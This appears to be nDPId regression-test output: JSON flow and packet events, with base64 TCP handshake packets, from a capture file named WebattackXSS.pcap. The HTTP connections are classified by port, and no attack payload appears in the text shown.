+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348056534,"flow_last_seen":1499348056534,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348056534,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1499348056534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LdZAAD4Gl\/qsEAABwKgKMoqwAFDDZCKVAAAAAKACchDdiQAAAgQFtAQCCAoBPQ9DAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9018,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":2,"flow_last_seen":1499348056535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056535,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQirDnT6dMw2QilqAScSBrLgAAAgQFtAQCCAoD5uC3AT0PQwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":3,"flow_last_seen":1499348056535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348056535,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LddAAD4GmAGsEAABwKgKMoqwAFDDZCKW50+nTYAQAOUKNgAAAQEICgE9D0MD5uC3"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348057789,"flow_last_seen":1499348057789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348057789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1499348057789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cW1AAD4GVGOsEAABwKgKMoq+AFBo3mEQAAAAAKACchD4TAAAAgQFtAQCCAoBPRB9AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":2,"flow_last_seen":1499348057790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057790,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQir7ZkVGbaN5hEaAScSDoJwAAAgQFtAQCCAoD5uHwAT0QfQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":3,"flow_last_seen":1499348057790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348057790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cW5AAD4GVGqsEAABwKgKMoq+AFBo3mER2ZFRnIAQAOWHLwAAAQEICgE9EH0D5uHw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348059068,"flow_last_seen":1499348059068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348059068,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1499348059068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJlAAD4GfTesEAABwKgKMorMAFAzNVklAAAAAKACchA0lAAAAgQFtAQCCAoBPRG8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9042,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":2,"flow_last_seen":1499348059069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQisz9Lu2rMzVZJqAScSBjgQAAAgQFtAQCCAoD5uMwAT0RvAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":3,"flow_last_seen":1499348059069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348059069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SJpAAD4GfT6sEAABwKgKMorMAFAzNVkm\/S7trIAQAOUCiAAAAQEICgE9Eb0D5uMw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348060393,"flow_last_seen":1499348060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060393,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1499348060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ItAAD4G9USsEAABwKgKMoraAFD\/pcOMAAAAAKACchD8YgAAAgQFtAQCCAoBPRMHAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9051,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":2,"flow_last_seen":1499348060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQitr3giqS\/6XDjaAScSDyygAAAgQFtAQCCAoD5uR7AT0TBwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":3,"flow_last_seen":1499348060394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348060394,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00IxAAD4G9UusEAABwKgKMoraAFD\/pcON94Iqk4AQAOWR0QAAAQEICgE9EwgD5uR7"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348061684,"flow_last_seen":1499348061684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348061684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1499348061684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8R+ZAAD4GfeqsEAABwKgKMoroAFA+FlOsAAAAAKACchAsggAAAgQFtAQCCAoBPRRKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":2,"flow_last_seen":1499348061684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiuhWb4DgPhZTraAScSBsbAAAAgQFtAQCCAoD5uW+AT0USgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":3,"flow_last_seen":1499348061685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348061685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0R+dAAD4GffGsEAABwKgKMoroAFA+FlOtVm+A4YAQAOULdAAAAQEICgE9FEoD5uW+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348064243,"flow_last_seen":1499348064243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348064243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1499348064243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y\/tAAD4GYdWsEAABwKgKMosCAFBtqHUxAAAAAKACchDY0AAAAgQFtAQCCAoBPRbKAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":2,"flow_last_seen":1499348064243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiwKN0\/hjbah1MqAScSBnUwAAAgQFtAQCCAoD5ug+AT0WygEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":3,"flow_last_seen":1499348064244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348064244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y\/xAAD4GYdysEAABwKgKMosCAFBtqHUyjdP4ZIAQAOUGWwAAAQEICgE9FsoD5ug+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348065546,"flow_last_seen":1499348065546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348065546,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1499348065546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065546,"pkt":"ABm5CmnxAMGxFOsxCABFAAA882RAAD4G0musEAABwKgKMosQAFA77ut0AAAAAKACchCS8wAAAgQFtAQCCAoBPRgQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":2,"flow_last_seen":1499348065547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQixCTY4b2O+7rdaAScSCMDQAAAgQFtAQCCAoD5umEAT0YEAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":3,"flow_last_seen":1499348065547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348065547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA082VAAD4G0nKsEAABwKgKMosQAFA77ut1k2OG94AQAOUrFQAAAQEICgE9GBAD5umE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348068136,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348068136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f2xAAD4GRmSsEAABwKgKMosqAFAaVGX7AAAAAKACchA3ZgAAAgQFtAQCCAoBPRqXAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":2,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiyoM4+ekGlRl\/KAScSBTywAAAgQFtAQCCAoD5uwLAT0alwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":3,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f21AAD4GRmusEAABwKgKMosqAFAaVGX8DOPnpYAQAOXy0gAAAQEICgE9GpcD5uwL"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348069426,"flow_last_seen":1499348069426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348069426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1499348069426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86kVAAD4G24qsEAABwKgKMos4AFDyvfGfAAAAAKACchDSBgAAAgQFtAQCCAoBPRvaAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9126,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":2,"flow_last_seen":1499348069426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiziWvrte8r3xoKAScSCPkwAAAgQFtAQCCAoD5u1OAT0b2gEDAwc="} 